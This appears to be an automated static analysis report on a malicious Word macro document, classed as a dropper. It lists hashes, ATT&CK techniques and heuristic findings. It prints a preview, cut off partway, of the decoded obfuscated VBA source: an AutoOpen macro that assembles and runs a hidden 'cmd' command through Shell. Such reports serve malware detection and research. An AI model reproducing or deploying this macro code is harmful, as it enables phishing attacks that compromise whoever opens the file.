Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9da3c2e9096f55f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 84.2 KB
First seen: 2019-05-16
MD5: af6abe3561c428edbf227bd39fd70857
SHA-1: bcfb0ca77f0ad8c5c9d52fef54901fd9d23c9444
SHA-256: b9da3c2e9096f55fc8387617187315084ae4d584a385bc180b5a8e8713f181b3
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. A critical heuristic fired on a Shell() call within the VBA code; Shell() is commonly used by macro droppers to execute arbitrary commands. An AutoOpen macro is also present, meaning the code runs automatically when the document is opened (if macros are enabled). The ClamAV detection 'Doc.Dropper.Sagent-6667985-0' further supports classifying the sample as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Sagent-6667985-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9188 bytes
SHA-256: 4dd914e699138747d7209f0b99ff9c1ffae272c77fe9a01c45b5bf8604a62cde
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DCIoViP"
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour wMYuAz / 89028
   Hour DLwoM / RwBhm / UAXEMG * StaWj
   Hour CwtOJQ * lGwocr
   Hour vKwmZ / GmUUJS
Shell ChrW(12 + 4 + 1 + 5 + 45) + pnfJDwIQAmMF + ICHcPcpPK + MRvkQL + umRtWz + vITao + mniwZMU + iBtkfQR + FXHhpsszl + bBPuSFirjq, 481116151 - 481116151
   Hour 37634 * 16713 * CjaFNU / jjTja
   Hour OszaAj * 20875
   Hour 15520 / wqRMaz
End Sub



Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()

On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
   Hour 52298 / brvId
   Hour 98170 / 5979
   Hour 93826 / lLlIb
   Hour 58048 * PSTzAY
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
   Hour rSVVX * ipdRV
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
Hour lYKDqL * DRvqlz
   Hour SjOWd * IoHLnw
   Hour 13847 / zZJaC
   Hour Ejhmi / Liolid
MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB"
Hour ZTfBNZ * FLWcu / wLIsq / jQPVA
   Hour 85837 * XkDcFJ / 79039 * atVSIh
   Hour 83767 / KkjLBw / 45172 * JnOPT
   Hour 77815 / HcFDcV
OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S"
Hour GZnwdG / 36176
   Hour 53 / rizjzQ / juVdiN * SaiSJ
zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G"
Hour 8551 / GRfzK
   Hour 24529 / CUlFJk * 39266 / QjUbX
   Hour GLIALI * TzmTA / 36107 * ZPflB
uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA"
Hour 13143 / SwpVnj
   Hour 69242 / 3376
   Hour GjXNb * wnhaIo
TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h"
Hour NGiihh / zOPJzS
   Hour 59246 * HNVrIj
JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^"
MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm
   Hour pZZPv / 40997
End Function
Function umRtWz()

On _
Error _
Resume _
Next
Hour QvNzCj * jhsEO / 61338 * Cbswj
   Hour FPzcY * NnrHnw * 40361 * qLWoTo
   Hour 83245 / HIPBTa * 37186 * hHXXw
   Hour PfTFR * jIVFsG / 75331 / wwmnv
TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^"
Hour 35269 / uUXuj
   Hour PrvAji * BWPhvJ
   Hour 330 * jPYKz * ITSUmh * 74136
TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^"
Hour qYpWT / SFCJu / 82951 / 58160
   Hour 84463 / HkpKai
   Hour MwwJiW * NUBRKJ
   Hour 81561 / wTiAG * YZVJu / LFjDRI
PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^"
Hour 18793 / FTzki / LUUCG * HKRnG
   Hour ViqRT / DDBFwL * 42049 / amYIz
   Hour 80361 * TXMPCG
JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s"
Hour 4094 / tbLJOW
   Hour 70526 / jXtfH * 58387 / GZCmk
   Hour 28709 / nijjM / 25640 / bwQcoo
VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s"
Hour 81619 * iCutL * 73703 * WcGjk
iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9"
Hour nwafq / wpmLh * 29355 / PvlkU
zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A"
Hour 37630 * qwuzXD
ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC"
Hour 70925 * dtorif / aQJEYU * CGpIRX
   Hour 32444 * 42522 * vQATnI / CaJbpZ
   Hour Bilzlh * AFiNH * iXMGjV / PBKzqH
FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4"
Hour 8087 * WJwOf * 33573 / HfBzLX
   Hour lmqXRb / DIrAzN
tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4"
Hour 85626 * FqzBMk / 11484 / vQHQz
   Hour FSlAa / OTVzLw / ipNFO * QSpTU
   Hour 
... (truncated)